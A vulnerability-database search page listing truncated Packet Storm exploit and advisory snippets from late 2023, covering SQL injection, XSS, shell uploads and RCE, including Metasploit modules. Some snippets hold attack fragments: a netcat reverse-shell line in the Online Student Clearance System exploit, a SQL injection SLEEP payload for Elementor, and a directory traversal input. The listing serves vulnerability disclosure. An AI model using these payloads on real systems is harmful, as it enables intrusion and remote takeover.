Lucene search
K
PacketstormRecent

50738 matches found

Packet Storm
Packet Storm
added 2023/12/04 12:0 a.m.312 views

GaatiTrack Courier Management System 1.0 SQL Injection

Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php...

7.4AI score0.01092EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/12/04 12:0 a.m.326 views

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vendor: R Radio Network Product web page: http://www.pktc.ac.th Affected version: 1.07 Summary: R Radio FM Transmitter that includes FM Exciter and FM Amplifier parameter setup. Desc: The transmitter suffers from an improper acces...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/12/04 12:0 a.m.372 views

PHPJabbers Time Slots Booking Calendar 4.0 HTML Injection

Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/ Version: v4.0 Tested on:...

7.4AI score0.00465EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/12/01 12:0 a.m.381 views

WBCE CMS 1.6.1 Shell Upload

Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution Date: 30/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.1.zip Version: 1.6.1 Tested on: https://www.softaculous.com/apps/cms/WBCECMS POC: 1...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/12/01 12:0 a.m.337 views

Kopage Website Builder 4.4.15 Cross Site Scripting

Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting XSS Date: 1/12/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.kopage.com/ Version: Version : 4.4.15 Tested on: https://demo.kopage.com/index.php Poc: 1 Install the system through the website and log in...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/30 12:0 a.m.438 views

Online Student Clearance System 1.0 Shell Upload

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

7.5CVSS7.1AI score0.00512EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/11/30 12:0 a.m.419 views

CE Phoenix 1.0.8.20 Remote Code Execution

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix EXPLOIT : import requests from bs4 import BeautifulSoup import sys impor...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/29 12:0 a.m.452 views

WordPress Royal Elementor Addons And Templates Remote Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Royal Elementor Addons RCE', 'Description' = %q Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor...

9.8CVSS7AI score0.81695EPSS
Exploits18
Packet Storm
Packet Storm
added 2023/11/28 12:0 a.m.395 views

Loytec L-INX Automation Servers Information Disclosure / Cleartext Secrets

CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389 + Title : Multiple vulnerabilities in Loytec L-INX Automation Servers + Vendor : LOYTEC electronics GmbH + Affected Products : LINX-151, Firmware 7.2.4, LINX-212, firmware 6.2.4 + Affected Components : L-INX Automation Servers +...

7.4AI score0.01973EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/28 12:0 a.m.500 views

SmartNode SN200 3.21.2-23021 OS Command Injection

Advisory ID: SYSS-2023-019 Product: SmartNode SN200 Analog Telephone Adapter ATA & VoIP Gateway Manufacturer: Patton LLC Affected Versions: = 3.21.2-23021 Tested Versions: 2.21.1-22041, 3.21.2-23021, 3.22.0-23083 Vulnerability Type: OS Command Injection CWE-78 Vulnerability Type: Improper Access...

9.8CVSS7.4AI score0.64113EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/11/28 12:0 a.m.367 views

etcd-browser 87ae63d75260 Directory Traversal

An issue was discovered in server.js in etcd-browser 87ae63d75260. By supplying a /../../../ Directory Traversal input to the URL's GET request while connecting to the remote server port specified during setup, an attacker can retrieve local operating system files from the remote system...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/28 12:0 a.m.358 views

Loytec LINX Configurator 7.4.10 Insecure Transit / Cleartext Secrets

CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385 + Title : Multiple vulnerabilities in Loytec LINX Configurator + Vendor : LOYTEC electronics GmbH + Affected Products : LINX Configurator 7.4.10 + Affected Components : LINX Configurator + Discovery Date : 01-Sep-2021 + Publication date :...

7.4AI score0.01522EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/28 12:0 a.m.851 views

m-privacy TightGate-Pro Code Execution / Insecure Permissions

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: m-privacy TightGate-Pro vulnerable version: Rolling Release, servers with the following package versions are vulnerable: tightgatevnc...

9.8CVSS7.4AI score0.13467EPSS
Exploits5
Packet Storm
Packet Storm
added 2023/11/28 12:0 a.m.695 views

Fortra Digital Guardian Agent Uninstaller Cross Site Scripting / UninstallKey Cached

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Uninstall Key Caching product: Fortra Digital Guardian Agent Uninstaller Data Loss Prevention vulnerable version: Agent: 7.9.4 fixed version: Agent: 7.9.4 CVE number:...

7.4AI score0.00306EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/27 12:0 a.m.336 views

osCommerce 4 Cross Site Scripting

Exploit Title: osCommerce 4 - Reflected XSS Exploit Author: CraCkEr Date: 13/11/2023 Vendor: osCommerce ltd. Vendor Homepage: https://www.oscommerce.com/ Software Link: https://demo.oscommerce.com/ Demo Link: https://demo.oscommerce.com/printshop/ Tested on: Windows 11 Home Impact: Manipulate the...

6.1CVSS7.4AI score0.00805EPSS
Exploits1
Packet Storm
Packet Storm
added 2023/11/27 12:0 a.m.331 views

PopojiCMS 2.0.1 Remote Command Execution

Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution Date: 27/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.popojicms.org/ Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip Version: Version : 2.0.1 Tested on:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/27 12:0 a.m.270 views

CSZ CMS 1.3.0 Remote Command Execution

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 17/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/27 12:0 a.m.272 views

CE Phoenix 1.0.8.20 Remote Command Execution

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix POC: 1. Login to admin panel: - Visit:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/27 12:0 a.m.265 views

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution Vendor: AAF Digital HD Forum | Atelmo GmbH Product web page: http://www.aaf-digital.info | https://www.atemio.de Affected version: Firmware =2.01 Summary: The Atemio AM 520 HD Full HD...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/25 12:0 a.m.304 views

PyroCMS 3.0.1 Cross Site Scripting

Exploit Title: PyroCMS v3.0.1 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://pyrocms.com/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/cms/PyroCMS...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/25 12:0 a.m.376 views

CSZ CMS 1.3.0 Shell Upload

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 23/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/25 12:0 a.m.279 views

CE Phoenix 1.0.8.20 Cross Site Scripting

Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://phoenixcart.org/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/ecommerce/CEPhoenix POC: 1-Login admin panel , go to this url :...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/22 12:0 a.m.694 views

WordPress UserPro 5.1.x Password Reset / Authentication Bypass / Escalation

Vulnerability Details & Technical Analysis Password Reset to Privilege Escalation using the Sensitive Information Disclosure via Shortcode Description: UserPro = 5.1.1 – Insecure Password Reset Mechanism Affected Plugin: UserPro Plugin Slug: userpro Affected Versions: = 5.1.1 CVE ID: CVE-2023-244...

9.8CVSS8.1AI score0.06801EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/11/20 12:0 a.m.641 views

Jorani Leave Management System 1.0.2 Host Header Injection

Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://jorani.org/ Software Link: https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip Version: v1.0.2 Tested...

7.5AI score0.00757EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/11/20 12:0 a.m.509 views

FireBear Improved Import And Export 3.8.6 XSLT Server Side Injection

Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT Server Side Injection Command Execution Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://commercemarketplace.adobe.com/ Software Link:...

7.5AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/20 12:0 a.m.470 views

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

Exploit Title: Multiple Cross Site Scripting in PHPJabbers Availability Booking Calendar v5.0 Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Orpon Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version:...

7.5AI score0.00499EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/20 12:0 a.m.384 views

PHPJabbers Availability Booking Calendar 5.0 CSV Injection

Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - CSV Injection Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version: v5.0...

7.5AI score0.01166EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/11/20 12:0 a.m.424 views

Shuttle Booking Software 2.0 Cross Site Scripting

Exploit Title: Shuttle Booking Software v2.0 - Multiple Stored Cross-Site Scripting Authenticated Date: 09/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/shuttle-booking-software/ Software Link:...

7.5AI score0.00721EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/11/20 12:0 a.m.414 views

Magento 2.4.6 XSLT Server Side Injection

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: Magento 2.4.6-p3 Version: 2.4.6 Tested on: 2.4.6 POC 1. Enter with admin credentials to this URL:...

7.5AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/20 12:0 a.m.432 views

GaatiTrack Courier Management System 1.0 Cross Site Scripting

Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting Date: 12/112023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link:...

7.5AI score0.00615EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/11/17 12:0 a.m.390 views

Magento 2.4.6 XSLT Server Side Injection / Command Execution

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip Version: 2.4.6 Tested on: 2.4.6 POC: 1 Enter with adm...

7.5AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/15 12:0 a.m.594 views

EzViz Studio 2.2.0 DLL Hijacking

PoC: DLL Hijacking via EzViz Studio Reported by EAFZ from Pythongoras Author: EAFZ aka myantti3m CVE: CVE-2023-41613. Test Environment: OS: Windows 11 Pro 64 bit10.0, Build 2261 EzViz Studio version: 2.2.0 Technical Description 1. Technical Description EzvizStudio.exe searches for a DLL called...

7.4AI score0.00451EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.647 views

AjaxPro Deserialization Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AjaxPro Deserialization Remote Code Execution', 'Description' = %q This module leverages an insecure deserialization of data to get remote code...

9.8CVSS6.9AI score0.88768EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.597 views

F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE', 'Description' = %q This module exploits a directory traversal in F5's BIG-IP Traffic...

10CVSS7.3AI score0.99999EPSS
Exploits60
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.632 views

F5 BIG-IP TMUI AJP Smuggling Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/proto/apachejp' class MetasploitModule 'F5 BIG-IP TMUI AJP Smuggling RCE', 'Description' = %q This module exploits a flaw in F5's BIG-IP Traffic Management...

9.8CVSS7.1AI score0.96515EPSS
Exploits17
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.942 views

Apache ActiveMQ Unauthenticated Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache ActiveMQ Unauthenticated Remote Code Execution', 'Description' = %q This module exploits a deserialization vulnerability in the OpenWire...

10CVSS7.1AI score0.99654EPSS
Exploits31
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.939 views

ZoneMinder Snapshots Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ZoneMinder Snapshots Command Injection', 'Description' = %q This module exploits an unauthenticated command injection in zoneminder that can be...

9.8CVSS6.9AI score0.80462EPSS
Exploits11
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.332 views

EnBw SENEC Legacy Storage Box Log Disclosure

Advisory ID: Ph0s-2023-001 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-284: Improper Access Control Risk Level: CVSS v3.1 Vector:...

6.9AI score0.00963EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.1154 views

Cisco IOX XE Unauthenticated Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco IOX XE Unauthenticated RCE Chain', 'Description' = %q This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable...

10CVSS7.2AI score0.99571EPSS
Exploits27
Packet Storm
Packet Storm
added 2023/11/14 12:0 a.m.730 views

MagnusBilling Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'MagnusBilling application unauthenticated Remote Command Execution.', 'Description' = %q A Command Injection vulnerabilit...

9.8CVSS6.9AI score0.9425EPSS
Exploits15
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.344 views

EnBw SENEC Legacy Storage Box Default Credentials

Advisory ID: Ph0s-2023-004 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-1392: Use of Default Credentials Risk Level: CVSS v3.1 Vector:...

7.4AI score
Exploits2
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.325 views

Maxima Max Pro Power 1.0 486A BLE Traffic Replay

Exploit Title: Maxima Max Pro Power - BLE Traffic Replay Unauthenticated Date: 13-Nov-2023 Exploit Author: Alok kumar [email protected], Cyberpwn Technologies Pvt. Ltd. Vendor Homepage: https://www.maximawatches.com Product Link: https://www.maximawatches.com/products/max-pro-power Firmware...

7.4AI score0.00511EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.324 views

EnBw SENEC Legacy Storage Box Information Disclosure

Advisory ID: Ph0s-2023-002 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor Risk Level: CVSS v3.1...

7.4AI score0.00963EPSS
Exploits5
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.266 views

Travel 1.0 SQL Injection

Title: travel-1.0-by-oretnom23 Multiple-SQLi Author: nu11secur1ty Date: 11/12/2023 Vendor: https://github.com/oretnom23 Software: https://github.com/oretnom23/php-travel-agency-system Reference: https://portswigger.net/web-security/sql-injection Description: The search parameter appears to be...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.508 views

WordPress Contact Form To Any API 1.1.2 SQL Injection

Exploit Title: WP Plugins Contact Form to Any API = 1.1.2 - SQL Injection Date: 12-11-2023 Exploit Author: Arvandy Software Link: https://wordpress.org/plugins/contact-form-to-any-api/ Vendor Homepage: https://www.itpathsolutions.com/ Version: 1.1.2 Tested on: Windows, Linux CVE: CVE-2023-32741...

7.2CVSS6.9AI score0.00557EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.555 views

EnBw SENEC Legacy Storage Box Exposed Interface

Advisory ID: Ph0s-2023-005 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-923: Improper Restriction of Communication Channel to Intended Endpoints Risk Level:...

7.4AI score0.01077EPSS
Exploits5
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.345 views

Penglead 2.0 SQL Injection

Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Date: 11/10/2023 Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.301 views

LOYTEC Electronics Insecure Transit / Insecure Permissions / Unauthenticated Access

CVE : CVE-2023-46380, CVE-2023-46381, CVE-2023-46382 + Title : Multiple vulnerabilities in Loytec LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, L-VIS Touch Panels + Vendor : LOYTEC electronics GmbH + Affected Products : LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2, LIOB-586...

6.9AI score0.07381EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.887 views

Elementor Website Builder SQL Injection

EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test',metakey='key4'where+metaid=SLEEP2; Press "Replace URL" on the Replace URL page. Burp Suit...

7.2CVSS7.4AI score0.19695EPSS
Exploits7
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.313 views

EnBw SENEC Legacy Storage Box Hardcoded Credentials

Advisory ID: Ph0s-2023-003 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-307: Improper Restriction of Excessive Authentication Attempts CWE-798: Use of...

7AI score0.00963EPSS
Exploits5
Total number of security vulnerabilities50738